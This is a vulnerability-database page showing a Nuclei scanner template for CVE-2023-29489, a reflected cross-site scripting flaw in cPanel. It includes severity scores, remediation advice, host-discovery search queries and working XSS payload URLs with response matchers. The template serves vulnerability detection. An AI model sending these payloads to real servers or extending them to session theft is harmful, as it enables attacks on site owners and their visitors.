Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-29489
HistoryApr 27, 2023 - 1:00 a.m.

cPanel < 11.109.9999.116 - Cross-Site Scripting

2023-04-2701:00:20
ProjectDiscovery
github.com
15
cpanel
cve2023
xss
webcall
security
vulnerability
patch
update

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.5 Medium

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

73.4%

An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
id: CVE-2023-29489

info:
  name: cPanel < 11.109.9999.116 - Cross-Site Scripting
  author: DhiyaneshDk,0xKayala
  severity: medium
  description: |
    An issue was discovered in cPanel before 11.109.9999.116. Cross Site Scripting can occur on the cpsrvd error page via an invalid webcall ID.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by cPanel to fix this vulnerability.
  reference:
    - https://blog.assetnote.io/2023/04/26/xss-million-websites-cpanel/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-29489
    - https://forums.cpanel.net/threads/cpanel-tsr-2023-0001-full-disclosure.708949/
    - https://github.com/SynixCyberCrimeMy/CVE-2023-29489
    - https://github.com/learnerboy88/CVE-2023-29489
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-29489
    cwe-id: CWE-79
    epss-score: 0.00354
    epss-percentile: 0.71955
    cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: cpanel
    product: cpanel
    shodan-query:
      - "title:\"cPanel\""
      - http.title:"cpanel"
      - cpe:"cpe:2.3:a:cpanel:cpanel"
      - http.title:"cpanel - api codes"
    fofa-query:
      - "title=\"cpanel - api codes\""
      - title="cpanel"
    google-query:
      - "intitle:\"cpanel - api codes\""
      - intitle:"cpanel"
  tags: cve,cve2023,cpanel,xss

http:
  - method: GET
    path:
      - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(document.domain)">aaaaaaaaaaaa'
      - '{{BaseURL}}/cpanelwebcall/<><img%20src=x%20onerror="prompt(document.domain)">'

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<img src=x onerror="prompt(document.domain)">aaaaaaaaaaaa'
          - 'Invalid webcall ID:'
        condition: and

      - type: status
        status:
          - 400
# digest: 490a0046304402200eeb293fb45080f8fe24ade360d2b725f37f3fe91271d74d972c46e7d5e439f802202a1364e4da300a7118361484b5e10c047d1a545d6dff08b59ed2989b090de0d6:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.5 Medium

AI Score

Confidence

High

0.004 Low

EPSS

Percentile

73.4%